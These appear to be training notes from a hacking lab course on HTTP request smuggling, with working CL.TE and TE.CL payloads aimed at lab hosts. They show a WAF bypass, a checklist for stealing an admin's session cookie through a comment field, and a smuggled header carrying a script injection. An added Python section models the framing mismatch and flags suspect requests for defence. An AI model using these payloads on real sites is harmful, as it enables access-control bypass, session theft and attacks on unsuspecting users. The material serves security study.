HTTP request smuggling vulnerabilities have high impact because they enable:
| Attack Type | Impact |
|---|---|
| WAF Bypass | Access restricted paths/endpoints |
| Session Hijacking | Steal user cookies/tokens |
| Forced Actions | Make users perform unintended actions |
| Data Theft | Capture personal/sensitive data |
| XSS Amplification | Exploit otherwise unexploitable XSS |
WAFs examine:
- URL paths and query parameters
- Request headers
- Request body content
- A maliciousness score computed from the above then decides whether the request is blocked
Example blocking rules:
- Block requests to /internal/ from external IPs
- Block requests containing SQL injection patterns
- Block requests with XSS payloads
WAF examines: request URL, headers, visible body
Smuggled request: hidden inside the body, parsed as a separate request only by the back-end
The WAF never sees the smuggled request as a request of its own; to the WAF it is only opaque body bytes.
CL.TE variant (front-end frames by Content-Length, back-end by Transfer-Encoding):

```http
POST / HTTP/1.1
Host: vuln.htb
Content-Length: 64
Transfer-Encoding: chunked

0

POST /internal/index.php HTTP/1.1
Host: localhost
Dummy: 
```

Content-Length: 64 covers everything after the blank line, so the front-end forwards the smuggled request as part of the body; the back-end stops at the 0 chunk and treats the rest as the start of the next request. The body ends after `Dummy: ` with no newline, so the first line of whatever request follows on the connection is swallowed into that header.

WAF sees: POST to / (allowed)
Back-end sees: POST to /internal/index.php (executed!)
TE.CL variant (front-end frames by Transfer-Encoding, back-end by Content-Length):

```http
GET / HTTP/1.1
Host: vuln.htb
Content-Length: 4
Transfer-Encoding: chunked

35
GET /internal/index.php HTTP/1.1
Host: localhost


0

```

The front-end reads the 0x35 (53-byte) chunk, which is the smuggled request including its terminating blank line, then the 0 chunk, and forwards it all as one request. The back-end reads Content-Length: 4 (`35` plus CRLF) as the body and parses the bytes after it as a new request.

WAF sees: GET to / (allowed)
Back-end sees: GET to /internal/index.php (executed!)
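Added illustration, not code from the original notes: a toy Python model of the framing discrepancy behind the two requests above. It frames the same connection bytes once by Content-Length and once by chunked Transfer-Encoding, shows which request lines each hop sees, and implements the two checks a strict hop or a detection rule applies before forwarding (both headers present; the two framings disagreeing on where the body ends). The function names (`frame_cl`, `frame_te`, `views`, `indicators`) and the "next client" request are mine; chunk extensions, trailers and header obfuscation are not modelled.

```python
# Added illustration, not code from the original notes. Names are mine;
# chunk extensions, trailers and TE obfuscation are not modelled.
from typing import Dict, List, Tuple


def split_head(buf: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split one message into request line, lower-cased header dict, remaining bytes."""
    head, sep, rest = buf.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete headers")
    lines = head.decode("latin-1").split("\r\n")
    if not lines[0]:
        raise ValueError("empty request line")  # orphaned bytes, not a request
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def frame_cl(buf: bytes):
    """Frame a message the way a Content-Length hop does (the 'CL' side)."""
    line, headers, rest = split_head(buf)
    n = int(headers.get("content-length", "0"))
    if len(rest) < n:
        raise ValueError("need more body bytes")  # the 'CL too large' hang from the notes
    return (line, headers, rest[:n]), rest[n:]


def frame_te(buf: bytes):
    """Frame a message the way a Transfer-Encoding hop does (the 'TE' side)."""
    line, headers, rest = split_head(buf)
    if headers.get("transfer-encoding", "").lower() != "chunked":
        return frame_cl(buf)  # not chunked: Content-Length applies
    body, pos = b"", 0
    while True:
        size_end = rest.index(b"\r\n", pos)
        size = int(rest[pos:size_end], 16)  # chunk sizes are hexadecimal
        pos = size_end + 2
        if size == 0:  # last-chunk "0\r\n" must be followed by the empty-trailer "\r\n"
            if rest[pos:pos + 2] != b"\r\n":
                raise ValueError("malformed last chunk")
            pos += 2
            break
        body += rest[pos:pos + size]
        pos += size + 2  # chunk data plus its own CRLF
    return (line, headers, body), rest[pos:]  # whatever follows starts the NEXT request


def split_requests(stream: bytes, mode: str):
    """Frame every complete request in one connection's bytes with a single rule."""
    framer = frame_cl if mode == "CL" else frame_te
    out = []
    while b"\r\n\r\n" in stream:
        try:
            req, stream = framer(stream)
        except ValueError:
            break  # incomplete or malformed remainder; a real server would 400 or wait
        out.append(req)
    return out, stream


def views(stream: bytes, front: str, back: str) -> Dict[str, List[str]]:
    """Request lines each hop sees in the same bytes, given its framing rule."""
    f, _ = split_requests(stream, front)
    b, _ = split_requests(stream, back)
    return {"front": [r[0] for r in f], "back": [r[0] for r in b]}


def indicators(buf: bytes) -> List[str]:
    """What a strict hop (or a detection rule) flags on one message before forwarding it."""
    found: List[str] = []
    _, headers, rest = split_head(buf)
    if headers.get("transfer-encoding", "").lower() == "chunked" and "content-length" in headers:
        found.append("CL and TE both present: RFC 7230 3.3.3 says TE wins and the message ought to be an error")
        try:
            (_, _, cl_body), _ = frame_cl(buf)
            _, te_left = frame_te(buf)
            if len(cl_body) != len(rest) - len(te_left):
                found.append("CL and TE disagree on where the body ends: the gap can hold a second request")
        except ValueError:
            pass  # incomplete on the wire; the first indicator already justifies a 400
    return found


# Constructed samples: the two WAF-bypass requests from the notes, plus a benign
# request from the next client that shares the upstream connection.
CL_TE = (
    b"POST / HTTP/1.1\r\nHost: vuln.htb\r\n"
    b"Content-Length: 64\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"0\r\n\r\n"  # TE hop stops here; CL hop counts 64 bytes and keeps going
    b"POST /internal/index.php HTTP/1.1\r\nHost: localhost\r\nDummy: "
)
TE_CL = (
    b"GET / HTTP/1.1\r\nHost: vuln.htb\r\n"
    b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"35\r\n"  # CL hop stops after these 4 bytes; TE hop reads the 0x35-byte chunk
    b"GET /internal/index.php HTTP/1.1\r\nHost: localhost\r\n\r\n"  # 53 bytes of chunk data
    b"\r\n0\r\n\r\n"  # the chunk's CRLF, then the last-chunk
)
NEXT_CLIENT = b"GET / HTTP/1.1\r\nHost: vuln.htb\r\n\r\n"
```

`views(CL_TE + NEXT_CLIENT, "CL", "TE")` returns the front-end seeing `POST /` then the next client's `GET /`, while the back-end sees `POST /` then `POST /internal/index.php` with the next client's request line absorbed into the `Dummy` header, exactly the split described above. `indicators()` flags both sample requests twice, which is the check a proxy should make before forwarding: reject (400) any message carrying both headers, or at least drop Content-Length when Transfer-Encoding is present, and normalise framing so the front-end and back-end never disagree.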
Force victims to submit their request data to a location you control (e.g., comment section, log file, API endpoint).
- Web app has comment functionality
- Comments are publicly visible
- App is vulnerable to CL.TE
A normal comment request:

```http
POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Length: 43
Content-Type: application/x-www-form-urlencoded

name=htb-stdnt&comment=Hello+World%21
```

The smuggling request (the smuggled request's Content-Length of 300 is deliberately larger than its own body, so the back-end keeps reading into the next request on the connection):

```http
POST / HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Transfer-Encoding: chunked

0

POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

name=hacker&comment=test
```

Admin's normal request:

```http
GET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>
```

Back-end sees the smuggled request with the admin's request appended as the rest of its body:

```http
POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

name=hacker&comment=testGET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>
```

The comment section now contains:

```
Hacker: testGET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>
```
Session cookie stolen! 🎯
Front-end view:
- Request 1: our POST / with the smuggled comment request in its body
- Request 2: admin's GET / with the session cookie

Back-end view:
- Request 1: our POST / with an empty body (it ends at the chunk terminator)
- Request 2: POST /comments.php whose body continues into the admin's request, captured as the comment parameter

The smuggled body ends with comment=test and no terminator, so the admin's entire request becomes the rest of the comment value.
The Content-Length of the smuggled request is crucial:
| CL Value | Result |
|---|---|
| Too small | Only partial data captured |
| Too large | Timeout waiting for more data |
| Just right | Full request captured |
Strategy: Trial and error, start with ~300 and adjust.
When smuggling authenticated actions, include:
- Your session cookie (Cookie header)
- CSRF tokens (if required)
- All mandatory form fields
Place CSRF tokens at the beginning of the smuggled body:

```
csrf=token123&name=hacker&comment=test
```

If the CSRF token is the last parameter, the appended victim data is glued onto its value and invalidates it.
Test for CL.TE with the HELLO + 405 technique.
Log in to get a valid session cookie and CSRF token.
Find where victim data can be captured:
- Comment sections
- Profile updates
- Log files
- API responses
```http
POST / HTTP/1.1
Host: target.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Transfer-Encoding: chunked

0

POST /comments.php HTTP/1.1
Host: target.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
Cookie: PHPSESSID=<your_session>

csrf=<your_token>&name=Hacker&comment=Stolen:
```

- Send the smuggling request
- Wait ~10 seconds for victim
- Check data sink for captured data
Replace your cookie with victim's stolen cookie:
Developer Tools → Application → Cookies → Edit session value
Reflected XSS in HTTP headers (e.g., Host, custom headers) is usually unexploitable:

```http
GET / HTTP/1.1
Host: vuln.htb
Vuln: "><script>alert(1)</script>
```

You cannot force a victim's browser to send custom headers!
Smuggle a request that injects the XSS payload into the victim's response:

```http
POST / HTTP/1.1
Host: vuln.htb
Content-Length: 63
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Vuln: "><script>alert(1)</script>
Dummy: 
```

- Our smuggled request, with the XSS payload in the Vuln header, is left in the back-end's buffer
- The victim sends a normal request
- The victim's request merges with our smuggled request (its first line is absorbed into the unterminated Dummy header)
- The back-end processes the merged request, which carries the XSS payload
- The victim receives the response containing the XSS
- The XSS executes in the victim's browser!
```text
Attacker                   Server                       Victim
   │                          │                            │
   │  Smuggle XSS payload     │                            │
   │─────────────────────────>│                            │
   │                          │                            │
   │                          │  XSS payload in buffer     │
   │                          │                            │
   │                          │        Normal GET /        │
   │                          │<───────────────────────────│
   │                          │                            │
   │                          │  Merges with XSS payload   │
   │                          │                            │
   │                          │      Response with XSS     │
   │                          │───────────────────────────>│
   │                          │                            │
   │                          │                      XSS EXECUTES!
```
- No user interaction required (unlike normal reflected XSS)
- Mass exploitation - affects all users visiting after your payload
- Exploit "unexploitable" header-based XSS vulnerabilities
| Technique | Vulnerability Type | Goal | Payload Location |
|---|---|---|---|
| WAF Bypass | CL.TE / TE.CL | Access restricted paths | Smuggled URL |
| Data Theft | CL.TE | Steal cookies/tokens | Comment parameter |
| Forced Actions | CL.TE | Make user perform action | Smuggled request |
| XSS Amplification | CL.TE / TE.CL | Execute XSS on victims | Smuggled header |
- Test for CL.TE vulnerability (HELLO + 405)
- Authenticate with provided credentials
- Post a test comment to capture the request format
- Craft smuggling payload with comment endpoint
- Send and wait for admin to visit
- Check comments for leaked admin request
- Extract session cookie from comment
- Replace your cookie with admin's
- Access admin panel